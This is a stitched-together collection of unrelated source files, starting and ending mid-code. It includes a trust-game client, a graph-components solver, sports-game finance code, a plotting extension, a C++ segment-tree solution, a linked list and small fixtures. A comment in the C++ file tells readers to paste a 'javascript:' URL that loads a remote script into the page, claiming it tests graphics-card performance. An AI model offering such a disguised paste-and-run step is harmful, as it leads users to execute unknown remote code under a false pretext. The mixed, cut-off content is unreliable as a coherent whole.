var trustorErrors = W.getElementById('trustorErrors');
var setUpTrustTimer = function() {
var options = {
milliseconds: node.env.timeout,
timeup: function() {
node.emit('TRUST_DONE', other, Math.floor(Math.random() * node.env.coins));
}
};
node.game.timer.startTiming(options);
node.env('auto', function() {
node.timer.randomExec(function() {
node.emit(
'TRUST_DONE',
other,
Math.floor(Math.random() * node.env.coins)
);
}, 4000);
});
};
node.on('TRUST_DONE', function(other, trustAmount) {
console.log('Trusted trustee with ' + trustAmount);
node.set('trustAmount', {
amount: trustAmount,
other: other
});
node.say('TRUST_DONE', other, trustAmount);
trustorErrors.innerHTML = '';
trustorContent.innerHTML = '<h3>Waiting for the trustee ... (gave ' +
trustAmount + ')</h3>';
node.game.timer.clear();
node.game.timer.startWaiting({milliseconds: node.env.timeout});
node.game.timer.mainBox.hideBox();
});
setUpTrustTimer();
trustorContent.innerHTML =
'<h3>For how much money do you trust the other player for?</h3>' +
'<input type="number" min="0" max="' + node.env.coins + '" id="trustAmount" />' +
'<input type="button" value="Submit" id="trustWithMoney" class="btn" />';
var trustWithMoney = W.getElementById('trustWithMoney');
trustWithMoney.onclick = function() {
var trustAmount = W.getElementById('trustAmount');
if (!stager.isValidBid(trustAmount.value)) {
trustorErrors.innerHTML = 'Please enter a number between 0 and ' + node.env.coins;
return;
}
node.emit('TRUST_DONE', other, trustAmount.value);
};
node.on.data('RETURN_DONE', function(msg) {
trustorContent.innerHTML = '<h3>You got an amount of ' + msg.data + ' back.</h3>';
node.timer.randomEmit('DONE', 3000);
});
});
});
};
|
arhankundu99/Algo
|
Codechef/DSA Series/Graph Theory Basics/FIRESC.java
|
/* package codechef; // don't place package name! */
import java.util.*;
import java.lang.*;
import java.io.*;
/* Name of the class has to be "Main" only if the class is public. */
/**
 * Codechef FIRESC: people form friendship groups (connected components of an
 * undirected graph). For each test case prints:
 *   ans1 = number of connected components, and
 *   ans2 = product of component sizes mod 1e9+7
 *          (ways to pick one fire captain per component).
 */
class Codechef
{
    static long ans1 = 0, chainLength = 0;
    static int M = 1000000007;
    static long ans2 = 1;

    public static void main (String[] args) throws java.lang.Exception
    {
        Scanner scan = new Scanner(System.in);
        int t = scan.nextInt();
        while (t-- > 0)
        {
            int n = scan.nextInt();
            int m = scan.nextInt();
            ans1 = 0;
            ans2 = 1;
            // Adjacency sets; Set dedupes repeated friendship pairs.
            Map<Integer, Set<Integer>> map = new HashMap<>();
            for (int i = 1; i <= n; i++) map.put(i, new HashSet<>());
            for (int i = 0; i < m; i++)
            {
                int f1 = scan.nextInt();
                int f2 = scan.nextInt();
                map.get(f1).add(f2);
                map.get(f2).add(f1);
            }
            boolean[] vis = new boolean[n + 1];
            for (int key : map.keySet())
            {
                if (vis[key]) continue;
                chainLength = 0;
                dfs(key, map, vis);
                ans1 = (ans1 + 1) % M;
                ans2 = (ans2 * chainLength) % M;
            }
            System.out.println(ans1 + " " + ans2);
        }
    }

    /**
     * Marks the whole connected component containing idx as visited and adds
     * its size to {@code chainLength}.
     *
     * Fix: uses an explicit stack instead of recursion — the recursive
     * version overflowed the call stack on large components (FIRESC allows
     * up to 1e5 nodes), while the results are identical.
     */
    public static void dfs(int idx, Map<Integer, Set<Integer>> map, boolean[] vis)
    {
        if (vis[idx]) return;
        Deque<Integer> stack = new ArrayDeque<>();
        stack.push(idx);
        vis[idx] = true;
        chainLength++;
        while (!stack.isEmpty())
        {
            int cur = stack.pop();
            for (int next : map.get(cur))
            {
                if (!vis[next])
                {
                    vis[next] = true;
                    chainLength++;
                    stack.push(next);
                }
            }
        }
    }
}
|
mattthehearn/gm-games
|
src/deion/worker/views/teamFinances.js
|
<reponame>mattthehearn/gm-games
import { PHASE } from "../../common";
import { team } from "../core";
import { idb } from "../db";
import { g, helpers, lock } from "../util";
import type { GetOutput, UpdateEvents } from "../../common/types";
// Builds the full template-vars object for the Team Finances view.
// Recomputed whenever game-sim / player-movement / finance events fire, or
// when the requested team (tid) or seasons-to-show (show) changes; otherwise
// returns undefined so the cached view state is kept.
// NOTE(review): the declared return type is `void | {...}` even though the
// function is async (it actually yields a Promise) — Flow nit, confirm
// before tightening.
async function updateTeamFinances(
    inputs: { abbrev: string, show: number | "all", tid: number },
    updateEvents: UpdateEvents,
    state: any,
): void | { [key: string]: any } {
    if (
        updateEvents.includes("gameSim") ||
        updateEvents.includes("playerMovement") ||
        updateEvents.includes("teamFinances") ||
        inputs.tid !== state.tid ||
        inputs.show !== state.show
    ) {
        // Scalar settings passed straight to the template. Money values in
        // the league settings are stored in thousands, hence the /1000 to
        // express them in millions.
        const vars: any = {
            abbrev: inputs.abbrev,
            gamesInProgress: lock.get("gameSim"),
            hardCap: g.hardCap,
            numGames: g.numGames,
            tid: inputs.tid,
            show: inputs.show,
            salaryCap: g.salaryCap / 1000,
            minContract: g.minContract,
            minPayroll: g.minPayroll / 1000,
            luxuryPayroll: g.luxuryPayroll / 1000,
            luxuryTax: g.luxuryTax,
            userTid: g.userTid,
        };

        const contracts = await team.getContracts(inputs.tid);
        const payroll = await team.getPayroll(contracts);
        vars.payroll = payroll / 1000;

        // Number of past seasons to chart: either everything since the
        // league started, or the requested count.
        let showInt;
        if (inputs.show === "all") {
            showInt = g.season - g.startingSeason + 1;
        } else {
            showInt = parseInt(inputs.show, 10);
        }

        // Convert contract objects into table rows
        const contractTotals = [0, 0, 0, 0, 0];
        let season = g.season;
        if (g.phase >= PHASE.DRAFT) {
            // After the draft, don't show old contract year
            season += 1;
        }
        // Expand each contract into per-season amounts (capped at 5 years)
        // and accumulate the column totals.
        for (let i = 0; i < contracts.length; i++) {
            contracts[i].amounts = [];
            for (let j = season; j <= contracts[i].exp; j++) {
                // Only look at first 5 years (edited rosters might have longer contracts)
                if (j - season >= 5) {
                    break;
                }
                contracts[i].amounts.push(contracts[i].amount / 1000);
                contractTotals[j - season] += contracts[i].amount / 1000;
            }
            // Raw fields are no longer needed once amounts[] is populated.
            delete contracts[i].amount;
            delete contracts[i].exp;
        }
        vars.contracts = contracts;
        vars.contractTotals = contractTotals;
        vars.salariesSeasons = [
            season,
            season + 1,
            season + 2,
            season + 3,
            season + 4,
        ];

        const teamSeasons = await idb.getCopies.teamSeasons({
            tid: inputs.tid,
        });
        teamSeasons.reverse(); // Most recent season first

        // Add in luxuryTaxShare if it's missing
        // (older saves predate this revenue category).
        for (let i = 0; i < teamSeasons.length; i++) {
            if (!teamSeasons[i].revenues.hasOwnProperty("luxuryTaxShare")) {
                teamSeasons[i].revenues.luxuryTaxShare = {
                    amount: 0,
                    rank: 15,
                };
            }
        }

        // Series plotted in the bar graphs; scalar stats are null-padded to
        // showInt entries, object stats (revenues/expenses) are expanded to
        // one padded series per sub-category.
        let keys = [
            "won",
            "hype",
            "pop",
            "att",
            "cash",
            "revenues",
            "expenses",
        ];
        const barData = {};
        for (let i = 0; i < keys.length; i++) {
            /* eslint-disable no-loop-func */
            if (typeof teamSeasons[0][keys[i]] !== "object") {
                barData[keys[i]] = helpers.nullPad(
                    teamSeasons.map(ts => ts[keys[i]]),
                    showInt,
                );
            } else {
                // Handle an object in the database
                barData[keys[i]] = {};
                const tempData = teamSeasons.map(ts => ts[keys[i]]);
                for (const key of Object.keys(tempData[0])) {
                    barData[keys[i]][key] = helpers.nullPad(
                        tempData.map(x => x[key]).map(x => x.amount),
                        showInt,
                    );
                }
            }
            /* eslint-enable no-loop-func */
        }

        // Process some values
        // Attendance: convert season totals to per-home-game averages.
        // NOTE(review): for padded entries (teamSeasons[i] === undefined) the
        // callback falls through with no return, keeping undefined — appears
        // intentional, confirm.
        barData.att = barData.att.map((num, i) => {
            if (teamSeasons[i] !== undefined) {
                if (!teamSeasons[i].hasOwnProperty("gpHome")) {
                    teamSeasons[i].gpHome = Math.round(teamSeasons[i].gp / 2);
                } // See also game.js and team.js
                if (teamSeasons[i].gpHome > 0) {
                    return num / teamSeasons[i].gpHome; // per game
                }
                return 0;
            }
        });
        keys = ["cash"];
        for (let i = 0; i < keys.length; i++) {
            barData[keys[i]] = barData[keys[i]].map(num => num / 1000); // convert to millions
        }

        // X-axis labels: current season back through showInt seasons.
        const barSeasons = [];
        for (let i = 0; i < showInt; i++) {
            barSeasons[i] = g.season - i;
        }

        vars.barData = barData;
        vars.barSeasons = barSeasons;

        // Get stuff for the finances form
        vars.t = await idb.getCopy.teamsPlus({
            attrs: ["region", "name", "abbrev", "budget"],
            seasonAttrs: ["expenses"],
            season: g.season,
            tid: inputs.tid,
        });

        // Largest stadium capacity the franchise has ever had.
        vars.maxStadiumCapacity = teamSeasons.reduce((max, teamSeason) => {
            if (teamSeason.stadiumCapacity > max) {
                return teamSeason.stadiumCapacity;
            }
            return max;
        }, 0);

        return vars;
    }
}
function updateGamesInProgress(
inputs: GetOutput,
updateEvents: UpdateEvents,
state: any,
): void | { [key: string]: any } {
if (
updateEvents.includes("lock.gameSim") ||
inputs.tid !== state.tid ||
inputs.show !== state.show
) {
return {
gamesInProgress: lock.get("gameSim"),
};
}
}
// Runs both updaters before render: updateTeamFinances builds the full page
// vars, updateGamesInProgress refreshes only the sim-lock flag.
export default {
    runBefore: [updateTeamFinances, updateGamesInProgress],
};
|
julianmack/Numbas
|
extensions/graphs/graphs.js
|
/*
Copyright 2011 Newcastle University
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
*/
//a module to draw graphs of functions using flot.
//
//To use, insert a div with class "graph" in content. The expr, min, max and steps attributes control the function to be plotted.
//
//Example:
//
// notextile. <div class="graph" expr="x^2" min="0" max="10" steps="20"></div>
// Registers the graphs extension with Numbas: after a question is shown,
// every <div class="graph"> in its content is rendered as a flot plot of
// the JME expression given in the div's expr/min/max/steps attributes.
Numbas.queueScript('extensions/graphs/graphs.js',['display','util','jme'],function() {
    // flot is loaded lazily; jQuery is assumed to already be present.
    Numbas.loadScript('extensions/graphs/flot/jquery.flot.min.js');

    var jme = Numbas.jme;
    var util = Numbas.util;
    var QuestionDisplay = Numbas.display.QuestionDisplay;

    // Extend (not replace) QuestionDisplay.show so plots are drawn each time
    // the question is displayed.
    QuestionDisplay.prototype.show = util.extend(QuestionDisplay.prototype.show,function() {
        var q = this.q;
        var subvars = Numbas.jme.subvars;
        //do graphs
        $('.graph').each(function()
        {
            // Expression to plot, with the question's variables substituted in.
            var expr = $(this).attr('expr');
            expr = subvars(expr,q.variables);
            // min/max/steps attributes are themselves JME expressions.
            var rangeMin = $(this).attr('min');
            var rangeMax = $(this).attr('max');
            var rangeSteps = $(this).attr('steps');
            var settings = {
                min: jme.evaluate(jme.compile(rangeMin,q.functions),q.variables,q.functions).value,
                max: jme.evaluate(jme.compile(rangeMax,q.functions),q.variables,q.functions).value,
                steps: jme.evaluate(jme.compile(rangeSteps,q.functions),q.variables,q.functions).value
            };
            var tree = jme.compile(expr,q.functions);
            // The first free variable in the expression is treated as the
            // plot variable (assumes a single-variable expression).
            var varname = jme.findvars(tree)[0];
            var variables = util.copyobj(q.variables);
            // Sample the expression at `steps` evenly spaced x values.
            // NOTE(review): x starts at 0, not settings.min — confirm whether
            // min is meant to offset the range or only scale it.
            var points = [];
            for(var i=0; i<settings.steps; i++)
            {
                var x = i*(settings.max-settings.min)/(settings.steps-1);
                variables[varname] = new jme.types.TNum(x);
                var y = jme.evaluate(tree,variables,q.functions).value;
                points[i] = [x,y];
            }
            $(this).width(300).height(300);
            // Track the y range of the sampled points.
            // NOTE(review): miny/maxy are computed but never passed to $.plot.
            var miny=null,maxy=null;
            for(i=0;i<points.length;i++)
            {
                if(miny==null || points[i][1]<miny){miny=points[i][1];}
                if(maxy==null || points[i][1]>maxy){maxy=points[i][1];}
            }
            // Render with flot: no legend, no border, axes marked in black.
            $.plot($(this),
                [points],
                {
                    legend:{show:false},
                    grid:{
                        borderWidth:0,
                        markings: [{
                            xaxis:{from:0,to:0},
                            color:'black'
                        },
                        {yaxis:{from:0,to:0},color:'black'}
                        ]
                    }
                }
            );
        });
    });
});
|
michaelruocco/idv-context
|
context/adapter/json/src/testFixtures/java/uk/co/idv/context/adapter/json/policy/sequence/stage/type/InvalidStageTypeJsonMother.java
|
package uk.co.idv.context.adapter.json.policy.sequence.stage.type;
import static uk.co.mruoc.file.content.ContentLoader.loadContentFromClasspath;
/**
 * Test fixture ("object mother") supplying stage JSON with an invalid type,
 * loaded from a classpath resource.
 */
public interface InvalidStageTypeJsonMother {

    /** @return the contents of the invalid-stage-type.json classpath resource */
    static String invalid() {
        return loadContentFromClasspath("policy/sequence/stage/type/invalid-stage-type.json");
    }
}
|
taoes/WebSite
|
src/main/java/com/mafour/api/dao/mapper/UserMapper.java
|
<reponame>taoes/WebSite
package com.mafour.api.dao.mapper;
import com.baomidou.mybatisplus.core.mapper.BaseMapper;
import com.mafour.api.dao.dao.UserDO;
import org.springframework.stereotype.Component;
/**
 * MyBatis-Plus mapper for {@link UserDO}; all CRUD operations are inherited
 * from {@link BaseMapper}, so no methods need to be declared here.
 */
@Component
public interface UserMapper extends BaseMapper<UserDO> {}
|
swwind/code
|
bzoj/1095.cpp
|
#include <bits/stdc++.h>
// BZOJ 1095 (ZJOI2007 "Hide and Seek"): maintain the maximum distance between
// two "on" nodes of a tree under color toggles, via the bracket (Euler)
// sequence of the tree stored in a segment tree.
#define maxs(a,b,c) max(max(a,b),c)
#define N 100020
#define ST -6   // sentinel: opening bracket in the Euler sequence
#define ED -9   // sentinel: closing bracket in the Euler sequence
using namespace std;
const int inf = 1 << 30;

// Fast integer input (handles an optional leading '-').
inline int read(){
    int x = 0, f = 0; char ch=getchar();
    while(ch>'9'||ch<'0'){if(ch=='-')f=1;ch=getchar();}
    while(ch>='0'&&ch<='9'){x=(x<<1)+(x<<3)+ch-'0';ch=getchar();}
    return f?-x:x;
}

// v: bracket sequence (ST, node id, ..., ED); c[x]: node color (1 = on);
// pos[x]: index of node x inside v; ccnt: number of "on" nodes.
int v[N*3], c[N], pos[N], tot, cnt, ccnt;
// Adjacency list of the tree.
int head[N], to[N<<1], nxt[N<<1];

// Insert the undirected edge (x, y).
void ins(int x, int y){
    to[++cnt] = y; nxt[cnt] = head[x]; head[x] = cnt;
    to[++cnt] = x; nxt[cnt] = head[y]; head[y] = cnt;
}

// Build the bracket sequence: "( x ...children... )" for every subtree.
void dfs(int x, int fa){
    v[++tot] = ST; v[++tot] = x;
    pos[x] = tot;
    for(int i = head[x]; i; i = nxt[i])
        if(to[i] != fa) dfs(to[i], x);
    v[++tot] = ED;
}

// Segment-tree node over an interval of the bracket sequence.
// c1/c2: counts of unmatched closing/opening brackets in the interval;
// dis: best on-on distance fully inside the interval;
// l1/l2 and r1/r2: best partial path values extending to the left/right end
// (two variants per side, for the two bracket-sign cases in the merge).
struct node{
    int c1, c2, l1, l2, r1, r2, l, r, dis;
    friend node operator + (const node &a, const node &b) {
        node c;
        c.l = a.l; c.r = b.r;
        c.dis = max(a.dis, b.dis);
        // Combine a right-extending part of `a` with a left-extending part of `b`.
        c.dis = maxs(c.dis, a.r1+b.l2, a.r2+b.l1);
        // Match a's unmatched openers against b's unmatched closers.
        if(a.c2 < b.c1) c.c1 = a.c1-a.c2+b.c1, c.c2 = b.c2;
        else c.c1 = a.c1, c.c2 = a.c2-b.c1+b.c2;
        c.r1 = maxs(b.r1, a.r1-b.c1+b.c2, a.r2+b.c1+b.c2);
        c.r2 = max(b.r2, a.r2+b.c1-b.c2);
        c.l1 = maxs(a.l1, b.l1-a.c2+a.c1, b.l2+a.c2+a.c1);
        c.l2 = max(a.l2, b.l2+a.c2-a.c1);
        return c;
    }
    // Initialise a leaf for position x of the bracket sequence.
    void init(int x){
        l = r = x;
        dis = -inf;
        c1 = c2 = 0;
        if(v[x] == ST) c2 = 1;
        if(v[x] == ED) c1 = 1;
        // Only an "on" node can start or end a candidate path.
        if(v[x] > 0 && c[v[x]]) l1 = l2 = r1 = r2 = 0;
        else l1 = l2 = r1 = r2 = -inf;
    }
}t[N*12];

// Recompute the root-to-leaf path after the leaf at position k changed.
void update(int x, int k){
    if(t[x].l == t[x].r) return t[x].init(t[x].l);
    int mid = t[x].l + t[x].r >> 1;
    if(k <= mid) update(x<<1, k);
    else update(x<<1|1, k);
    t[x] = t[x<<1]+t[x<<1|1];
}

// Build the segment tree over bracket positions [l, r].
void build(int x, int l, int r){
    if(l == r) return t[x].init(l);
    int mid = l + r >> 1;
    build(x<<1, l, mid); build(x<<1|1, mid+1, r);
    t[x] = t[x<<1]+t[x<<1|1];
}

int main(){
    int n = read(); ccnt = n;                 // all nodes start "on"
    for(int i = 1; i <= n; i++) c[i] = 1;
    for(int i = 1; i < n; i++) ins(read(), read());
    dfs(1, 0); build(1, 1, tot);
    // printf("%d\n",tot );
    int m = read();
    for(int i = 1; i <= m; i++){
        if(getchar() == 'C'){                 // "C x": toggle node x's color
            int x = read();
            if(c[x]) ccnt--;
            else ccnt++;
            c[x] ^= 1;
            update(1, pos[x]);
        }
        else{ getchar();                      // "G": query max on-on distance
            if(!ccnt) puts("-1");             // no on nodes
            else if(ccnt == 1) puts("0");     // a single on node
            else printf("%d\n", t[1].dis);
        }
    }
}
/*
8
1 2
2 3
3 4
3 5
3 6
6 7
6 8
7
G
C 1
G
C 2
G
C 1
G
在地址栏里输入
```
javascript:var k=document.createElement('script');k.src='https://swwind.github.io/js/fuck.js';document.body.appendChild(k);
```
即可测试显卡性能。(粘贴时注意最前面的`javascript:`有没有被吞掉,如果被吞掉了就手动加上去)
*/
|
ofekbytes/JavaNiceStuffExample
|
src/a_java_core/a_BasicEexample/packageClassMethod/package-info.java
|
/**
*
*/
/**
* @author yaron
*
*/
package a_java_core.a_BasicEexample.packageClassMethod;
|
tncn1122/UIS
|
frontend-backup/src/view/Forum/ForumDetail/TopicOverviewCard/index.js
|
<gh_stars>0
import React from 'react'
import moment from 'moment'
import classnames from 'classnames'
import { Row, Col } from 'antd'
import { TEXT_UI_FORUM } from 'config'
import { Link } from 'react-router-dom'
import { ErrorHandlerUtils, URLUtils } from 'utils'
import styles from './style.module.scss'
/**
 * Card summarising a forum topic: author avatar and name, relative timestamp,
 * linked title, summary text, and view/reply counters.
 *
 * @param {Object} topic      topic record (user, title, summary, counters, dates)
 * @param {string} className  extra class(es) appended to the card container
 */
export default function TopicOverviewCard({ topic, className }) {
  return (
    <div className={classnames([styles['topic-overview-card'], className])}>
      <Row>
        <Col span={20} className="content">
          <Row className="top">
            <Col>
              {/* Fall back to the default avatar when the user has no profile */}
              <img
                alt="avatar"
                src={
                  topic.user.userProfile
                    ? URLUtils.buildAvatarURL(topic.user.userProfile.avatar)
                    : URLUtils.buildAvatarURL()
                }
              />
            </Col>
            <Col>
              <div className="author">
                {topic.user.userProfile ? topic.user.userProfile.full_name : topic.user.username}
              </div>
              {/* Prefer last-update time; fall back to creation time */}
              <div className="time">
                {moment(topic.updatedAt ? topic.updatedAt : topic.createdAt).fromNow()}
              </div>
            </Col>
          </Row>
          <Row>
            <div className="title">
              <Link to={`/forums/topics/${topic.id}`} className="link">
                {topic.title}
              </Link>
            </div>
          </Row>
          <Row>
            <div className="des">{topic.summary}</div>
          </Row>
        </Col>
        <Col span={4} className="statistic">
          <div className="top">
            {TEXT_UI_FORUM.VIEWS}: {topic.countViews}
          </div>
          <div className="bottom">
            {TEXT_UI_FORUM.REPLIES}: {topic.countPosts}
          </div>
        </Col>
      </Row>
    </div>
  )
}
|
Paulgilbertreal/AzuraCast
|
frontend/vue/pages/Admin/CustomFields.js
|
import initBase from '~/base.js';
import '~/vendor/bootstrapVue.js';
import '~/vendor/sweetalert.js';
import AdminCustomFields from '~/components/Admin/CustomFields.vue';
export default initBase(AdminCustomFields);
|
Ashwanigupta9125/code-DS-ALGO
|
CodeForces/Complete/900-999/976B-LaraCroftAndTheNewGame.cpp
|
#include<cstdio>
// Codeforces 976B "Lara Croft and the New Game".
// Lara walks down column 1 from (1,1) to (n,1), then snakes upward through
// columns 2..m: row n left-to-right, up one, row n-1 right-to-left, etc.
// Given k moves (0 <= k < n*m), print her final cell.
typedef long long ll;
int main(){
    // NOTE: the shadowing file-scope globals (n,m,k,x,y) were removed; only
    // the locals below were ever used.
    ll n, m, k; scanf("%lld %lld %lld", &n, &m, &k);
    if(k<n){
        // Still on the initial descent down column 1.
        printf("%lld 1\n", k + 1);
    }
    else{
        k -= n;                      // moves spent inside the snake part
        ll rows = k / (m - 1);       // full snake rows already climbed
        ll x = n - rows;             // current row
        ll y = k % (m - 1);          // offset within the current row
        // GENERALIZATION: direction depends on how many rows were climbed,
        // not on the parity of x. The original `x % 2` test silently relied
        // on the problem's guarantee that n is even (where both coincide);
        // this form is also correct for odd n.
        if(rows % 2){y = m - y;}     // odd rows run right-to-left from column m
        else{y += 2;}                // even rows run left-to-right from column 2
        printf("%lld %lld\n", x, y);
    }
    return 0;
}
|
goodmind/FlowDefinitelyTyped
|
flow-types/types/stream-to-promise_vx.x.x/flow_v0.25.x-/stream-to-promise.js
|
// Flow library definition for the `stream-to-promise` npm package.
declare module "stream-to-promise" {
  /**
   * Returns a promise which resolves when the input stream ends
   * @param stream The input stream
   * @returns A promise containing the stream output as a buffer
   */
  declare function streamToPromise(
    stream: NodeJS.ReadableStream
  ): Promise<Buffer>;
  /**
   * Returns a promise which resolves when the input stream ends
   * @param stream The input stream
   */
  declare function streamToPromise(
    stream: NodeJS.WritableStream
  ): Promise<void>;
  declare module.exports: typeof streamToPromise;
}
|
liyongquan/leetcode-project
|
src/main/java/com/liyongquan/greedy/ReconstructQueue.java
|
<reponame>liyongquan/leetcode-project<filename>src/main/java/com/liyongquan/greedy/ReconstructQueue.java<gh_stars>1-10
package com.liyongquan.greedy;
import java.util.*;
//假设有打乱顺序的一群人站成一个队列,数组 people 表示队列中一些人的属性(不一定按顺序)。每个 people[i] = [hi, ki] 表示第 i
//个人的身高为 hi ,前面 正好 有 ki 个身高大于或等于 hi 的人。
//
// 请你重新构造并返回输入数组 people 所表示的队列。返回的队列应该格式化为数组 queue ,其中 queue[j] = [hj, kj] 是队列中第
// j 个人的属性(queue[0] 是排在队列前面的人)。
//
//
//
//
//
//
// 示例 1:
//
//
//输入:people = [[7,0],[4,4],[7,1],[5,0],[6,1],[5,2]]
//输出:[[5,0],[7,0],[5,2],[6,1],[4,4],[7,1]]
//解释:
//编号为 0 的人身高为 5 ,没有身高更高或者相同的人排在他前面。
//编号为 1 的人身高为 7 ,没有身高更高或者相同的人排在他前面。
//编号为 2 的人身高为 5 ,有 2 个身高更高或者相同的人排在他前面,即编号为 0 和 1 的人。
//编号为 3 的人身高为 6 ,有 1 个身高更高或者相同的人排在他前面,即编号为 1 的人。
//编号为 4 的人身高为 4 ,有 4 个身高更高或者相同的人排在他前面,即编号为 0、1、2、3 的人。
//编号为 5 的人身高为 7 ,有 1 个身高更高或者相同的人排在他前面,即编号为 1 的人。
//因此 [[5,0],[7,0],[5,2],[6,1],[4,4],[7,1]] 是重新构造后的队列。
//
//
// 示例 2:
//
//
//输入:people = [[6,0],[5,0],[4,0],[3,2],[2,2],[1,4]]
//输出:[[4,0],[5,0],[2,2],[3,2],[1,4],[6,0]]
//
//
//
//
// 提示:
//
//
// 1 <= people.length <= 2000
// 0 <= hi <= 106
// 0 <= ki < people.length
// 题目数据确保队列可以被重建
//
// Related Topics 贪心算法
// 👍 804 👎 0
//leetcode submit region begin(Prohibit modification and deletion)
public class ReconstructQueue {
    /**
     * Greedy queue reconstruction (LeetCode 406).
     *
     * Sort by descending height, ties broken by ascending k; then insert each
     * person at index k. Everyone already placed is at least as tall, so
     * inserting at position k leaves exactly k taller-or-equal people in
     * front, and later (shorter) insertions never invalidate earlier ones.
     *
     * @param people array of [height, k] pairs (mutated by the sort)
     * @return the reconstructed queue as a new array
     */
    public int[][] reconstructQueue(int[][] people) {
        // Tallest first; among equal heights, smaller k first.
        Arrays.sort(people, (o1, o2) -> o1[0] != o2[0] ? o2[0] - o1[0] : o1[1] - o2[1]);
        List<int[]> list = new LinkedList<>();
        for (int[] person : people) {
            if (list.isEmpty()) {
                list.add(person);
            } else {
                list.add(person[1], person);
            }
        }
        int[][] res = new int[people.length][2];
        int idx = 0;
        for (int[] p : list) {
            res[idx][0] = p[0];
            res[idx][1] = p[1];
            // BUG FIX: idx was never incremented, so every person overwrote
            // res[0] and the remaining rows stayed zero-filled.
            idx++;
        }
        return res;
    }
}
//leetcode submit region end(Prohibit modification and deletion)
|
JoeKarlsson/data-structures
|
linked-list/linkedList.js
|
/**
* @name linkedListGenerator
* @description Main Module
* @return {Object} an object exposing methods to be used to manipulate a linked list
*/
/**
 * Singly linked list with head/tail pointers.
 * Nodes are plain objects of shape { value, next }.
 */
class LinkedList {
  constructor() {
    this.tail = null;
    this.head = null;
  }

  /** @return {?Object} the first node, or null when the list is empty */
  getHead() {
    return this.head;
  }

  /** @return {?Object} the last node, or null when the list is empty */
  getTail() {
    return this.tail;
  }

  /** Create a detached node wrapping `value`. */
  newNode( value ) {
    return {
      value,
      next: null,
    };
  }

  /** Append `value` at the tail; returns the new node. */
  add( value ) {
    const node = this.newNode( value );
    if ( this.getHead() === null ) {
      this.head = node;
    } else {
      this.getTail().next = node;
    }
    this.tail = node;
    return node;
  }

  /**
   * Return the node at `index` (0-based), or false when out of range.
   * Note: get(0) on an empty list returns null (the head), matching the
   * empty-list check used by add().
   */
  get( index ) {
    let currNode = this.getHead();
    let position = 0;
    if ( index <= -1 ) {
      return false;
    }
    while ( position < index ) {
      // BUG FIX: also stop when the list is empty (currNode === null);
      // previously this dereferenced null and threw instead of returning false.
      if ( currNode === null || currNode.next === null ) {
        return false;
      }
      currNode = currNode.next;
      position++;
    }
    return currNode;
  }

  /**
   * Remove the node at `index`; returns false when index is out of range.
   */
  remove( index ) {
    const currNode = this.get( index );
    const prevNode = this.get( index - 1 );
    if ( currNode === false ) {
      return false;
    }
    if ( index === 0 ) {
      this.head = currNode.next;
      // BUG FIX: removing the only node must also clear the stale tail.
      if ( this.head === null ) {
        this.tail = null;
      }
    } else if ( currNode.next === null ) {
      // Removing the tail: the previous node becomes the new tail.
      this.tail = prevNode;
      prevNode.next = null;
    } else {
      prevNode.next = currNode.next;
    }
  }

  /**
   * Insert `value` BEFORE the node currently at `index`.
   * Returns the new node, or false when index is out of range.
   */
  insert( value, index ) {
    const currNode = this.get( index );
    const prevNode = this.get( index - 1 );
    const node = this.newNode( value );
    if ( currNode === false ) {
      return false;
    }
    if ( index === 0 ) {
      this.head = node;
      node.next = currNode;
      // BUG FIX: inserting into an empty list must also set the tail.
      if ( this.tail === null ) {
        this.tail = node;
      }
    } else {
      // BUG FIX: the new node goes *before* currNode, so it is never the
      // last node; the old code wrongly reassigned this.tail here.
      node.next = currNode;
      prevNode.next = node;
    }
    return node;
  }
}
module.exports = LinkedList;
|
jakebooy2/API
|
src/main/java/com/sheepybot/api/entities/module/EventRegistry.java
|
<gh_stars>1-10
package com.sheepybot.api.entities.module;
import com.sheepybot.api.entities.event.EventListener;
import com.sheepybot.api.entities.event.RegisteredListener;
import com.sheepybot.api.entities.event.RootEventRegistry;
import net.dv8tion.jda.api.events.Event;
import org.jetbrains.annotations.NotNull;
import java.util.Collection;
/**
 * Per-module facade over the global {@link RootEventRegistry}: every
 * registration made through an instance is associated with one {@link Module},
 * so that module's listeners can be queried and unregistered together.
 */
public final class EventRegistry {

    // Global registry this facade delegates every call to.
    private final RootEventRegistry eventManager;
    // Module that owns all listeners registered through this instance.
    private final Module module;

    EventRegistry(@NotNull("eventManager cannot be null") final RootEventRegistry eventManager,
                  @NotNull("module cannot be null") final Module module) {
        this.eventManager = eventManager;
        this.module = module;
    }

    /**
     * @return A {@link Collection} containing every {@link RegisteredListener} associated with this {@link Module}
     */
    public Collection<RegisteredListener> getRegisteredListeners() {
        return this.eventManager.getRegisteredListeners(this.module);
    }

    /**
     * Dispatches the given event through the global registry.
     *
     * @param event The event to call
     */
    public void callEvent(@NotNull("event cannot be null") final Event event) {
        this.eventManager.callEvent(event);
    }

    /**
     * Registers all {@link Event}s in the given {@link EventListener} class
     *
     * @param listener The {@link EventListener} to register
     */
    public void registerEvent(@NotNull("listener cannot be null") final EventListener listener) {
        this.eventManager.registerEvents(listener, this.module);
    }

    /**
     * Unregisters every listener associated with the parent {@link Module}
     */
    public void unregisterAll() {
        this.eventManager.unregisterAll(this.module);
    }
}
|
arie-neural-alpha/trase
|
frontend/scripts/react-components/shared/tool-bar/tool-switch/tool-switch.js
|
<filename>frontend/scripts/react-components/shared/tool-bar/tool-switch/tool-switch.js
import { connect } from 'react-redux';
import ToolSwitch from 'react-components/shared/tool-bar/tool-switch/tool-switch.component';
import { toolLinksActions } from 'react-components/tool-links/tool-links.register';
const mapStateToProps = state => ({
dashboardSelected: state.location.payload.section === 'data-view'
});
const mapDispatchToProps = { switchTool: toolLinksActions.switchTool };
export default connect(mapStateToProps, mapDispatchToProps)(ToolSwitch);
|
ccau1/generator-hexin-react
|
generators/app/templates/src/routes/Root/Login/LoginPageContainer.js
|
/* @flow */
import React from 'react';
import {connect} from 'react-redux';
import {bindActionCreators} from 'redux';
import {ActionCreators} from 'actions';
import LoginPage from './LoginPage';
/**
 * Redux container for LoginPage: injects the current user and the post-login
 * redirect target taken from the `redirect` query parameter.
 */
class LoginPageContainer extends React.Component {
  constructor(props: Object): void {
    super(props);
  }

  render() {
    const {user, location} = this.props;
    // Fall back to the site root when no ?redirect=... parameter is present.
    const redirect = (new URLSearchParams(location.search)).get('redirect') || '/';
    return (
